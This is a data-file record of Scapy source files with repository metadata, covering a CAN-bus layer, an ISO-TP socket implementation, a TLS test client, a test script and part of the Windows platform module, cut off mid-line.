commands:\n```\ngit clone https://github.com/secdev/scapy\ncd scapy\n./run_scapy\n>>>\n```\n\nTo benefit from all Scapy features, such as plotting, you might want to install\nPython modules, such as `matplotlib` or `cryptography`. See the\n[documentation](http://scapy.readthedocs.io/en/latest/installation.html) and\nfollow the instructions to install them.\n\n[//]: # (stop_pypi_description)\n## Contributing ##\n\nWant to contribute? Great! Please take a few minutes to\n[read this](CONTRIBUTING.md)!\n" }, { "alpha_fraction": 0.6257359385490417, "alphanum_fraction": 0.6291000843048096, "avg_line_length": 36.15625, "blob_id": "537166c5d4276811ab35b0bfcb01a41fb18ae61f", "content_id": "44459524506ddd5be843375ff08958300ba4c97c", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3567, "license_type": "permissive", "max_line_length": 105, "num_lines": 96, "path": "/scapy/scapy/layers/can.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Philippe Biondi <phil@secdev.org>\n# This program is published under a GPLv2 license\n\n\n\"\"\"A minimal implementation of the CANopen protocol, based on\nWireshark dissectors. See https://wiki.wireshark.org/CANopen\n\n\"\"\"\n\nimport struct\nimport scapy.modules.six as six\nfrom scapy.compat import *\nfrom scapy.config import conf\nfrom scapy.data import DLT_CAN_SOCKETCAN\nfrom scapy.fields import BitField, FieldLenField, FlagsField, StrLenField, \\\n ThreeBytesField, XBitField\nfrom scapy.packet import Packet, bind_layers, RawVal\nfrom scapy.layers.l2 import CookedLinux\n\n\n# Mimics the Wireshark CAN dissector parameter 'Byte-swap the CAN ID/flags field'\n# set to True when working with PF_CAN sockets\nconf.contribs['CAN'] = {'swap-bytes': False}\n\n\nclass CAN(Packet):\n \"\"\"A minimal implementation of the CANopen protocol, based on\n Wireshark dissectors. See https://wiki.wireshark.org/CANopen\n\n \"\"\"\n fields_desc = [\n FlagsField('flags', 0, 3, ['error', 'remote_transmission_request', 'extended']),\n XBitField('identifier', 0, 29),\n FieldLenField('length', None, length_of='data', fmt='B'),\n ThreeBytesField('reserved', 0),\n StrLenField('data', '', length_from=lambda pkt: pkt.length),\n ]\n\n @staticmethod\n def inv_endianness(pkt):\n \"\"\" Invert the order of the first four bytes of a CAN packet\n\n This method is meant to be used specifically to convert a CAN packet\n between the pcap format and the socketCAN format\n\n :param pkt: str of the CAN packet\n :return: packet str with the first four bytes swapped\n \"\"\"\n len_partial = len(pkt) - 4 # len of the packet, CAN ID excluded\n return struct.pack('<I{}s'.format(len_partial), *struct.unpack('>I{}s'.format(len_partial), pkt))\n\n def pre_dissect(self, s):\n \"\"\" Implements the swap-bytes functionality when dissecting \"\"\"\n if conf.contribs['CAN']['swap-bytes']:\n return CAN.inv_endianness(s)\n return s\n\n def self_build(self, field_pos_list=None):\n \"\"\" Implements the swap-bytes functionality when building\n\n this is based on a copy of the Packet.self_build default method.\n The goal is to affect only the CAN layer data and keep\n under layers (e.g LinuxCooked) unchanged\n \"\"\"\n if self.raw_packet_cache is not None:\n for fname, fval in six.iteritems(self.raw_packet_cache_fields):\n if self.getfieldval(fname) != fval:\n self.raw_packet_cache = None\n self.raw_packet_cache_fields = None\n break\n if self.raw_packet_cache is not None:\n if conf.contribs['CAN']['swap-bytes']:\n return CAN.inv_endianness(self.raw_packet_cache)\n return self.raw_packet_cache\n p = b\"\"\n for f in self.fields_desc:\n val = self.getfieldval(f.name)\n if isinstance(val, RawVal):\n sval = raw(val)\n p += sval\n if field_pos_list is not None:\n field_pos_list.append((f.name, sval.encode('string_escape'), len(p), len(sval)))\n else:\n p = f.addfield(self, p, val)\n if conf.contribs['CAN']['swap-bytes']:\n return CAN.inv_endianness(p)\n return p\n\n def extract_padding(self, p):\n return b'', p\n\n\nconf.l2types.register(DLT_CAN_SOCKETCAN, CAN)\nbind_layers(CookedLinux, CAN, proto=12)\n" }, { "alpha_fraction": 0.5031259655952454, "alphanum_fraction": 0.5182220339775085, "avg_line_length": 37.017391204833984, "blob_id": "621b4bd256e40f497cd5a9845e639b2a0f3bf3f1", "content_id": "80382b90206d74effb31414702fb3decf5b42796", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13116, "license_type": "permissive", "max_line_length": 86, "num_lines": 345, "path": "/scapy/scapy/contrib/isotp.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Nils Weiss <nils@we155.de>\n# This program is published under a GPLv2 license\n\n\"\"\"\nISOTPSocket.\n\"\"\"\n\n\nimport ctypes\nfrom ctypes.util import find_library\nimport struct\nimport socket\nimport time\n\nimport scapy.modules.six as six\nfrom scapy.error import Scapy_Exception, warning\nfrom scapy.packet import Packet\nfrom scapy.fields import StrField\nfrom scapy.supersocket import SuperSocket\nfrom scapy.sendrecv import sndrcv, sniff\nfrom scapy.arch.linux import get_last_packet_timestamp, SIOCGIFINDEX\nfrom scapy.config import conf\nfrom scapy.consts import WINDOWS\n\nif six.PY2:\n Scapy_Exception(\"ISOTP is not supported on python2, yet. \"\n \"Switch to python3 and try it again.\")\n\n\nif not WINDOWS:\n LIBC = ctypes.cdll.LoadLibrary(find_library(\"c\"))\n warning(\"Loading libc with ctypes\")\nelse:\n warning(\"libc is unavailable\")\n\n\n\"\"\"\nISOTP Packet\n\"\"\"\n\n\nclass ISOTP(Packet):\n name = 'ISOTP'\n fields_desc = [\n StrField('data', B\"\")\n ]\n\n def hashret(self):\n return self.payload.hashret()\n\n def answers(self, other):\n if other.__class__ == self.__class__:\n return self.payload.answers(other.payload)\n return 0\n\n\nCAN_MTU = 16\nCAN_MAX_DLEN = 8\n\nCAN_ISOTP = 6 # ISO 15765-2 Transport Protocol\n\nSOL_CAN_ISOTP = (socket.SOL_CAN_BASE + CAN_ISOTP)\n# /* for socket options affecting the socket (not the global system) */\nCAN_ISOTP_OPTS = 1 # /* pass struct can_isotp_options */\nCAN_ISOTP_RECV_FC = 2 # /* pass struct can_isotp_fc_options */\n\n# /* sockopts to force stmin timer values for protocol regression tests */\nCAN_ISOTP_TX_STMIN = 3 # /* pass __u32 value in nano secs */\nCAN_ISOTP_RX_STMIN = 4 # /* pass __u32 value in nano secs */\nCAN_ISOTP_LL_OPTS = 5 # /* pass struct can_isotp_ll_options */\n\nCAN_ISOTP_LISTEN_MODE = 0x001 # /* listen only (do not send FC) */\nCAN_ISOTP_EXTEND_ADDR = 0x002 # /* enable extended addressing */\nCAN_ISOTP_TX_PADDING = 0x004 # /* enable CAN frame padding tx path */\nCAN_ISOTP_RX_PADDING = 0x008 # /* enable CAN frame padding rx path */\nCAN_ISOTP_CHK_PAD_LEN = 0x010 # /* check received CAN frame padding */\nCAN_ISOTP_CHK_PAD_DATA = 0x020 # /* check received CAN frame padding */\nCAN_ISOTP_HALF_DUPLEX = 0x040 # /* half duplex error state handling */\nCAN_ISOTP_FORCE_TXSTMIN = 0x080 # /* ignore stmin from received FC */\nCAN_ISOTP_FORCE_RXSTMIN = 0x100 # /* ignore CFs depending on rx stmin */\nCAN_ISOTP_RX_EXT_ADDR = 0x200 # /* different rx extended addressing */\n\n# /* default values */\nCAN_ISOTP_DEFAULT_FLAGS = 0\nCAN_ISOTP_DEFAULT_EXT_ADDRESS = 0x00\nCAN_ISOTP_DEFAULT_PAD_CONTENT = 0xCC # /* prevent bit-stuffing */\nCAN_ISOTP_DEFAULT_FRAME_TXTIME = 0\nCAN_ISOTP_DEFAULT_RECV_BS = 0\nCAN_ISOTP_DEFAULT_RECV_STMIN = 0x00\nCAN_ISOTP_DEFAULT_RECV_WFTMAX = 0\nCAN_ISOTP_DEFAULT_LL_MTU = CAN_MTU\nCAN_ISOTP_DEFAULT_LL_TX_DL = CAN_MAX_DLEN\nCAN_ISOTP_DEFAULT_LL_TX_FLAGS = 0\n\n\nclass SOCKADDR(ctypes.Structure):\n # See /usr/include/i386-linux-gnu/bits/socket.h for original struct\n _fields_ = [(\"sa_family\", ctypes.c_uint16),\n (\"sa_data\", ctypes.c_char * 14)]\n\n\nclass TP(ctypes.Structure):\n # This struct is only used within the SOCKADDR_CAN struct\n _fields_ = [(\"rx_id\", ctypes.c_uint32),\n (\"tx_id\", ctypes.c_uint32)]\n\n\nclass ADDR_INFO(ctypes.Union):\n # This struct is only used within the SOCKADDR_CAN struct\n # This union is to future proof for future can address information\n _fields_ = [(\"tp\", TP)]\n\n\nclass SOCKADDR_CAN(ctypes.Structure):\n # See /usr/include/linux/can.h for original struct\n _fields_ = [(\"can_family\", ctypes.c_uint16),\n (\"can_ifindex\", ctypes.c_int),\n (\"can_addr\", ADDR_INFO)]\n\n\nclass IFREQ(ctypes.Structure):\n # The two fields in this struct were originally unions.\n # See /usr/include/net/if.h for original struct\n _fields_ = [(\"ifr_name\", ctypes.c_char * 16),\n (\"ifr_ifindex\", ctypes.c_int)]\n\n\nclass ISOTPSocket(SuperSocket):\n desc = \"read/write packets at a given CAN interface using CAN_ISOTP socket\"\n can_isotp_options_fmt = \"@2I4B\"\n can_isotp_fc_options_fmt = \"@3B\"\n can_isotp_ll_options_fmt = \"@3B\"\n sockaddr_can_fmt = \"@H3I\"\n\n def __build_can_isotp_options(\n self,\n flags=CAN_ISOTP_DEFAULT_FLAGS,\n frame_txtime=0,\n ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS,\n txpad_content=0,\n rxpad_content=0,\n rx_ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS):\n return struct.pack(self.can_isotp_options_fmt,\n flags,\n frame_txtime,\n ext_address,\n txpad_content,\n rxpad_content,\n rx_ext_address)\n\n # == Must use native not standard types for packing ==\n # struct can_isotp_options {\n # __u32 flags; /* set flags for isotp behaviour. */\n # /* __u32 value : flags see below */\n #\n # __u32 frame_txtime; /* frame transmission time (N_As/N_Ar) */\n # /* __u32 value : time in nano secs */\n #\n # __u8 ext_address; /* set address for extended addressing */\n # /* __u8 value : extended address */\n #\n # __u8 txpad_content; /* set content of padding byte (tx) */\n # /* __u8 value : content on tx path */\n #\n # __u8 rxpad_content; /* set content of padding byte (rx) */\n # /* __u8 value : content on rx path */\n #\n # __u8 rx_ext_address; /* set address for extended addressing */\n # /* __u8 value : extended address (rx) */\n # };\n\n def __build_can_isotp_fc_options(self,\n bs=CAN_ISOTP_DEFAULT_RECV_BS,\n stmin=CAN_ISOTP_DEFAULT_RECV_STMIN,\n wftmax=CAN_ISOTP_DEFAULT_RECV_WFTMAX):\n return struct.pack(self.can_isotp_fc_options_fmt,\n bs,\n stmin,\n wftmax)\n # == Must use native not standard types for packing ==\n # struct can_isotp_fc_options {\n #\n # __u8 bs; /* blocksize provided in FC frame */\n # /* __u8 value : blocksize. 0 = off */\n #\n # __u8 stmin; /* separation time provided in FC frame */\n # /* __u8 value : */\n # /* 0x00 - 0x7F : 0 - 127 ms */\n # /* 0x80 - 0xF0 : reserved */\n # /* 0xF1 - 0xF9 : 100 us - 900 us */\n # /* 0xFA - 0xFF : reserved */\n #\n # __u8 wftmax; /* max. number of wait frame transmiss. */\n # /* __u8 value : 0 = omit FC N_PDU WT */\n # };\n\n def __build_can_isotp_ll_options(self,\n mtu=CAN_ISOTP_DEFAULT_LL_MTU,\n tx_dl=CAN_ISOTP_DEFAULT_LL_TX_DL,\n tx_flags=CAN_ISOTP_DEFAULT_LL_TX_FLAGS):\n return struct.pack(self.can_isotp_ll_options_fmt,\n mtu,\n tx_dl,\n tx_flags)\n\n # == Must use native not standard types for packing ==\n # struct can_isotp_ll_options {\n #\n # __u8 mtu; /* generated & accepted CAN frame type */\n # /* __u8 value : */\n # /* CAN_MTU (16) -> standard CAN 2.0 */\n # /* CANFD_MTU (72) -> CAN FD frame */\n #\n # __u8 tx_dl; /* tx link layer data length in bytes */\n # /* (configured maximum payload length) */\n # /* __u8 value : 8,12,16,20,24,32,48,64 */\n # /* => rx path supports all LL_DL values */\n #\n # __u8 tx_flags; /* set into struct canfd_frame.flags */\n # /* at frame creation: e.g. CANFD_BRS */\n # /* Obsolete when the BRS flag is fixed */\n # /* by the CAN netdriver configuration */\n # };\n\n def __get_sock_ifreq(self, sock, iface):\n socketID = ctypes.c_int(sock.fileno())\n ifr = IFREQ()\n ifr.ifr_name = iface.encode('ascii')\n ret = LIBC.ioctl(socketID, SIOCGIFINDEX, ctypes.byref(ifr))\n\n if ret < 0:\n m = u'Failure while getting \"{}\" interface index.'.format(iface)\n raise Scapy_Exception(m)\n return ifr\n\n def __bind_socket(self, sock, iface, sid, did):\n socketID = ctypes.c_int(sock.fileno())\n ifr = self.__get_sock_ifreq(sock, iface)\n\n if sid > 0x7ff:\n sid = sid | socket.CAN_EFF_FLAG\n if did > 0x7ff:\n did = did | socket.CAN_EFF_FLAG\n\n # select the CAN interface and bind the socket to it\n addr = SOCKADDR_CAN(ctypes.c_uint16(socket.PF_CAN),\n ifr.ifr_ifindex,\n ADDR_INFO(TP(ctypes.c_uint32(sid),\n ctypes.c_uint32(did))))\n\n error = LIBC.bind(socketID, ctypes.byref(addr), ctypes.sizeof(addr))\n\n if error < 0:\n warning(\"Couldn't bind socket\")\n\n def __set_option_flags(self, sock, extended_addr=None,\n extended_rx_addr=None,\n listen_only=False):\n option_flags = CAN_ISOTP_DEFAULT_FLAGS\n if extended_addr is not None:\n option_flags = option_flags | CAN_ISOTP_EXTEND_ADDR\n else:\n extended_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS\n\n if extended_rx_addr is not None:\n option_flags = option_flags | CAN_ISOTP_RX_EXT_ADDR\n else:\n extended_rx_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS\n\n if listen_only:\n option_flags = option_flags | CAN_ISOTP_LISTEN_MODE\n\n sock.setsockopt(SOL_CAN_ISOTP,\n CAN_ISOTP_OPTS,\n self.__build_can_isotp_options(\n flags=option_flags,\n ext_address=extended_addr,\n rx_ext_address=extended_rx_addr))\n\n def __init__(self,\n iface=None,\n sid=0,\n did=0,\n extended_addr=None,\n extended_rx_addr=None,\n listen_only=False,\n basecls=ISOTP):\n self.iface = conf.contribs['NativeCANSocket']['iface'] \\\n if iface is None else iface\n self.ins = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, CAN_ISOTP)\n self.__set_option_flags(self.ins,\n extended_addr,\n extended_rx_addr,\n listen_only)\n\n self.ins.setsockopt(SOL_CAN_ISOTP,\n CAN_ISOTP_RECV_FC,\n self.__build_can_isotp_fc_options())\n self.ins.setsockopt(SOL_CAN_ISOTP,\n CAN_ISOTP_LL_OPTS,\n self.__build_can_isotp_ll_options())\n\n self.__bind_socket(self.ins, iface, sid, did)\n self.outs = self.ins\n if basecls is None:\n warning('Provide a basecls ')\n self.basecls = basecls\n\n def recv_raw(self, x=0xffff):\n \"\"\"Receives a packet, then returns a tuple containing (cls, pkt_data, time)\"\"\"\n try:\n pkt = self.ins.recvfrom(x)[0]\n except BlockingIOError: # noqa: F821\n warning('Captured no data, socket in non-blocking mode.')\n return None\n except socket.timeout:\n warning('Captured no data, socket read timed out.')\n return None\n except OSError:\n # something bad happened (e.g. the interface went down)\n warning(\"Captured no data.\")\n return None\n\n ts = get_last_packet_timestamp(self.ins)\n return self.basecls, pkt, ts\n\n def send(self, x):\n if hasattr(x, \"sent_time\"):\n x.sent_time = time.time()\n return self.outs.send(bytes(x))\n\n def sr(self, *args, **kargs):\n return sndrcv(self, *args, **kargs)\n\n def sr1(self, *args, **kargs):\n data = sndrcv(self, *args, **kargs)\n if data:\n return data[0][0][1]\n\n def sniff(self, *args, **kargs):\n return sniff(opened_socket=self, *args, **kargs)\n" }, { "alpha_fraction": 0.6705750823020935, "alphanum_fraction": 0.6845337748527527, "avg_line_length": 31.563636779785156, "blob_id": "648a1bb966db74db0625e4aa5ada5f4ae29c400f", "content_id": "b29e81b025292203967abccece25405f3f373f0b", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 99, "num_lines": 55, "path": "/scapy/test/tls/travis_test_client.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nTLS client used in unit tests.\n\nStart our TLS client, send our send_data, and terminate session with an Alert.\nOptional cipher_cuite_code and version may be provided as hexadecimal strings\n(e.g. c09e for TLS_DHE_RSA_WITH_AES_128_CCM and 0303 for TLS 1.2).\nReception of the exact send_data on the server is to be checked externally.\n\"\"\"\n\nimport sys, os, time\nimport multiprocessing\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\"../../\"))\nsys.path=[basedir]+sys.path\n\nfrom scapy.layers.tls.automaton_cli import TLSClientAutomaton\nfrom scapy.layers.tls.handshake import TLSClientHello\n\n\nsend_data = cipher_suite_code = version = None\n\ndef run_tls_test_client(send_data=None, cipher_suite_code=None, version=None):\n if version == \"0002\":\n t = TLSClientAutomaton(data=[send_data, b\"stop_server\", b\"quit\"], version=\"sslv2\")\n else:\n ch = TLSClientHello(version=int(version, 16), ciphers=int(cipher_suite_code, 16))\n t = TLSClientAutomaton(client_hello=ch, data=[send_data, b\"stop_server\", b\"quit\"], debug=1)\n t.run()\n\nfrom travis_test_server import run_tls_test_server\n\ndef test_tls_client(suite, version, q):\n msg = (\"TestC_%s_data\" % suite).encode()\n # Run server\n q_ = multiprocessing.Manager().Queue()\n th_ = multiprocessing.Process(target=run_tls_test_server, args=(msg, q_))\n th_.start()\n # Synchronise threads\n assert q_.get() is True\n time.sleep(1)\n # Run client\n run_tls_test_client(msg, suite, version)\n # Wait for server\n th_.join(60)\n if th_.is_alive():\n th_.terminate()\n raise RuntimeError(\"Test timed out\")\n # Return values\n q.put(q_.get())\n q.put(th_.exitcode)\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18, "blob_id": "a184bbf2e15d1bd40a2d4979a04974ee0bbc6300", "content_id": "0ad4b40a0e4252813c6e501956b41b3a955fd44e", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 57, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/scapy/test/run_tests_py2", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nPYTHON=python2\n. $(dirname $0)/run_tests \"$@\"\n" }, { "alpha_fraction": 0.5769277811050415, "alphanum_fraction": 0.5897932648658752, "avg_line_length": 35.90443801879883, "blob_id": "d8247118e1497664a1702599d55d6c8f5d1a5f3e", "content_id": "9a5e1c4765a4edf4ecebb894a5ca3d021c81c9f8", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49046, "license_type": "permissive", "max_line_length": 147, "num_lines": 1329, "path": "/scapy/scapy/arch/windows/__init__.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Philippe Biondi <phil@secdev.org>\n# Copyright (C) Gabriel Potter <gabriel@potter.fr>\n# This program is published under a GPLv2 license\n\n\"\"\"\nCustomizations needed to support Microsoft Windows.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport re\nimport sys\nimport socket\nimport time\nimport itertools\nimport platform\nimport subprocess as sp\nfrom glob import glob\nimport ctypes\nfrom ctypes import wintypes\nimport tempfile\nfrom threading import Thread, Event\n\nimport scapy\nfrom scapy.config import conf, ConfClass\nfrom scapy.error import Scapy_Exception, log_loading, log_runtime, warning\nfrom scapy.utils import atol, itom, inet_aton, inet_ntoa, PcapReader, pretty_list\nfrom scapy.utils6 import construct_source_candidate_set\nfrom scapy.base_classes import Gen, Net, SetGen\nfrom scapy.data import MTU, ETHER_BROADCAST, ETH_P_ARP\n\nimport scapy.modules.six as six\nfrom scapy.modules.six.moves import range, zip, input, winreg\nfrom scapy.compat import plain_str\n\n_winapi_SetConsoleTitle = ctypes.windll.kernel32.SetConsoleTitleW\n_winapi_SetConsoleTitle.restype = wintypes.BOOL\n_winapi_SetConsoleTitle.argtypes = [wintypes.LPWSTR]\n\n_winapi_GetHandleInformation = ctypes.windll.kernel32.GetHandleInformation\n_winapi_GetHandleInformation.restype = wintypes.BOOL\n_winapi_GetHandleInformation.argtypes = [wintypes.HANDLE, ctypes.POINTER(wintypes.DWORD)]\n\n_winapi_SetHandleInformation = ctypes.windll.kernel32.SetHandleInformation\n_winapi_SetHandleInformation.restype = wintypes.BOOL\n_winapi_SetHandleInformation.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.DWORD]\n\nconf.use_pcap = False\nconf.use_dnet = False\nconf.use_winpcapy = True\n\nWINDOWS = (os.name == 'nt')\n\n# hot-patching socket for missing variables on Windows\nimport socket\nif not hasattr(socket, 'IPPROTO_IPIP'):\n socket.IPPROTO_IPIP = 4\nif not hasattr(socket, 'IPPROTO_AH'):\n socket.IPPROTO_AH = 51\nif not hasattr(socket, 'IPPROTO_ESP'):\n socket.IPPROTO_ESP = 50\nif not hasattr(socket, 'IPPROTO_GRE'):\n socket.IPPROTO_GRE = 47\n\nfrom scapy.arch import pcapdnet\nfrom scapy.arch.pcapdnet import *\n\n_WlanHelper = NPCAP_PATH + \"\\\\WlanHelper.exe\"\n\nimport scapy.consts\n\nIS_WINDOWS_XP = platform.release() == \"XP\"\n\n\ndef is_new_release():\n release = platform.release()\n if conf.prog.powershell is None:\n return False\n try:\n if float(release) >= 8:\n return True\n except ValueError:\n if (release == \"post2008Server\"):\n return True\n return False\n\n\ndef _encapsulate_admin(cmd):\n \"\"\"Encapsulate a command with an Administrator flag\"\"\"\n # To get admin access, we start a new powershell instance with admin\n # rights, which will execute the command\n return \"Start-Process PowerShell -windowstyle hidden -Wait -Verb RunAs -ArgumentList '-command &{%s}'\" % cmd\n\n\ndef _windows_title(title=None):\n \"\"\"Updates the terminal title with the default one or with `title`\n if provided.\"\"\"\n if conf.interactive:\n _winapi_SetConsoleTitle(title or \"Scapy v{}\".format(conf.version))\n\n\ndef _suppress_file_handles_inheritance(r=1000):\n \"\"\"HACK: python 2.7 file descriptors.\n\n This magic hack fixes https://bugs.python.org/issue19575\n and https://github.com/secdev/scapy/issues/1136\n by suppressing the HANDLE_FLAG_INHERIT flag to a range of\n already opened file descriptors.\n Bug was fixed on python 3.4+\n \"\"\"\n if sys.version_info[0:2] >= (3, 4):\n return []\n\n import stat\n from msvcrt import get_osfhandle\n\n HANDLE_FLAG_INHERIT = 0x00000001\n\n handles = []\n for fd in range(r):\n try:\n s = os.fstat(fd)\n except OSError:\n continue\n if stat.S_ISREG(s.st_mode):\n osf_handle = get_osfhandle(fd)\n flags = wintypes.DWORD()\n _winapi_GetHandleInformation(osf_handle, flags)\n if flags.value & HANDLE_FLAG_INHERIT:\n _winapi_SetHandleInformation(osf_handle, HANDLE_FLAG_INHERIT, 0)\n handles.append(osf_handle)\n\n return handles\n\n\ndef _restore_file_handles_inheritance(handles):\n \"\"\"HACK: python 2.7 file descriptors.\n\n This magic hack fixes https://bugs.python.org/issue19575\n and https://github.com/secdev/scapy/issues/1136\n by suppressing the HANDLE_FLAG_INHERIT flag to a range of\n already opened file descriptors.\n Bug was fixed on python 3.4+\n \"\"\"\n if sys.version_info[0:2] >= (3, 4):\n return\n\n HANDLE_FLAG_INHERIT = 0x00000001\n\n for osf_handle in handles:\n try:\n _winapi_SetHandleInformation(osf_handle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)\n except (ctypes.WinError, WindowsError, OSError):\n pass\n\n\nclass _PowershellManager(Thread):\n \"\"\"Instance used to send multiple commands on the same Powershell process.\n Will be instantiated on loading and automatically stopped.\n \"\"\"\n\n def __init__(self):\n opened_handles = _suppress_file_handles_inheritance()\n try:\n # Start & redirect input\n if conf.prog.powershell:\n cmd = [conf.prog.powershell,\n \"-NoLogo\", \"-NonInteractive\", # Do not print headers\n \"-Command\", \"-\"] # Listen commands from stdin\n else: # Fallback on CMD (powershell-only commands will fail, but scapy use the VBS fallback)\n cmd = [conf.prog.cmd]\n # Let's hide the window with startup infos\n startupinfo = sp.STARTUPINFO()\n startupinfo.dwFlags |= sp.STARTF_USESHOWWINDOW\n self.process = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, stderr=sp.STDOUT, startupinfo=startupinfo)\n self.cmd = not conf.prog.powershell\n finally:\n _restore_file_handles_inheritance(opened_handles)\n self.buffer = []\n self.running = True\n self.query_complete = Event()\n Thread.__init__(self)\n self.daemon = True\n self.start()\n if self.cmd:\n self.query([\"echo @off\"]) # Remove header\n else:\n self.query([\"$FormatEnumerationLimit=-1\"]) # Do not crop long IP lists\n _windows_title() # Reset terminal title\n\n def run(self):\n while self.running:\n read_line = self.process.stdout.readline().strip()\n if read_line == b\"scapy_end\":\n self.query_complete.set()\n else:\n self.buffer.append(read_line.decode(\"utf8\", \"ignore\") if six.PY3 else read_line)\n\n def query(self, command, crp=True, rst_t=False):\n self.query_complete.clear()\n if not self.running:\n self.__init__(self)\n # Call powershell query using running process\n self.buffer = []\n # 'scapy_end' is used as a marker of the end of execution\n query = \" \".join(command) + (\"&\" if self.cmd else \";\") + \" echo scapy_end\\n\"\n self.process.stdin.write(query.encode())\n self.process.stdin.flush()\n self.query_complete.wait()\n if rst_t:\n _windows_title()\n return self.buffer[crp:] # Crops first line: the command\n\n def close(self):\n self.running = False\n try:\n self.process.stdin.write(\"exit\\n\")\n self.process.terminate()\n except:\n pass\n\n\ndef _exec_query_ps(cmd, fields):\n \"\"\"Execute a PowerShell query, using the cmd command,\n and select and parse the provided fields.\n \"\"\"\n if not conf.prog.powershell:\n raise OSError(\"Scapy could not detect powershell !\")\n # Build query\n query_cmd = cmd + ['|', 'select %s' % ', '.join(fields), # select fields\n '|', 'fl', # print as a list\n '|', 'out-string', '-Width', '4096'] # do not crop\n l = []\n # Ask the powershell manager to process the query\n stdout = POWERSHELL_PROCESS.query(query_cmd)\n # Process stdout\n for line in stdout:\n if not line.strip(): # skip empty lines\n continue\n sl = line.split(':', 1)\n if len(sl) == 1:\n l[-1] += sl[0].strip()\n continue\n else:\n l.append(sl[1].strip())\n if len(l) == len(fields):\n yield l\n l = []\n\n\ndef _vbs_exec_code(code, split_tag=\"@\"):\n if not conf.prog.cscript:\n raise OSError(\"Scapy could not detect cscript !\")\n tmpfile = tempfile.NamedTemporaryFile(mode=\"wb\", suffix=\".vbs\", delete=False)\n tmpfile.write(raw(code))\n tmpfile.close()\n ps = sp.Popen([conf.prog.cscript, tmpfile.name],\n stdout=sp.PIPE, stderr=open(os.devnull),\n universal_newlines=True)\n for _ in range(3):\n # skip 3 first lines\n ps.stdout.readline()\n for line in ps.stdout:\n data = line.replace(\"\\n\", \"\").split(split_tag)\n for l in data:\n yield l\n os.unlink(tmpfile.name)\n _windows_title()\n\n\ndef _get_hardware_iface_guid(devid):\n \"\"\"\n Get the hardware interface guid for device with 'devid' number\n or None if such interface does not exist.\n \"\"\"\n devid = int(devid) + 1\n\n hkey = winreg.HKEY_LOCAL_MACHINE\n node = r\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards\\{}\".format(devid)\n try:\n key = winreg.OpenKey(hkey, node)\n guid, _ = winreg.QueryValueEx(key, \"ServiceName\")\n winreg.CloseKey(key)\n except WindowsError:\n return None\n guid = guid.strip()\n return guid if guid.startswith(\"{\") and guid.endswith(\"}\") else None\n\n\ndef _get_npcap_dot11_adapters():\n \"\"\"\n Get the npcap 802.11 adapters from the registry or None if npcap\n is not 802.11 enabled.\n \"\"\"\n hkey = winreg.HKEY_LOCAL_MACHINE\n node = r\"SYSTEM\\CurrentControlSet\\Services\\npcap\\Parameters\"\n try:\n key = winreg.OpenKey(hkey, node)\n dot11_adapters, _ = winreg.QueryValueEx(key, \"Dot11Adapters\")\n winreg.CloseKey(key)\n except WindowsError:\n return None\n return dot11_adapters\n\n\n# Some names differ between VBS and PS\n# None: field will not be returned under VBS\n_VBS_WMI_FIELDS = {\n \"Win32_NetworkAdapter\": {\n \"InterfaceDescription\": \"Description\",\n # Note: when using VBS, the GUID is not the same than with Powershell\n # So we use get the device ID instead, then use _get_hardware_iface_guid\n # To get its real GUID\n \"GUID\": \"DeviceID\"\n },\n \"*\": {\n \"Status\": \"State\"\n }\n}\nif IS_WINDOWS_XP:\n # On windows XP, InterfaceIndex does not exist in cscript, and is Index.\n # This is not the case on Windows 7+\n _VBS_WMI_FIELDS[\"Win32_NetworkAdapter\"][\"InterfaceIndex\"] = \"Index\"\n\n_VBS_WMI_REPLACE = {\n \"Win32_NetworkAdapterConfiguration\": {\n \"line.IPAddress\": \"\\\"{\\\" & Join( line.IPAddress, \\\", \\\" ) & \\\"}\\\"\",\n }\n}\n\n_VBS_WMI_OUTPUT = {\n \"Win32_NetworkAdapter\": {\n \"DeviceID\": _get_hardware_iface_guid,\n }\n}\n\n\ndef _exec_query_vbs(cmd, fields):\n \"\"\"Execute a query using VBS. Currently Get-WmiObject, Get-Service\n queries are supported.\n\n \"\"\"\n if not(len(cmd) == 2 and 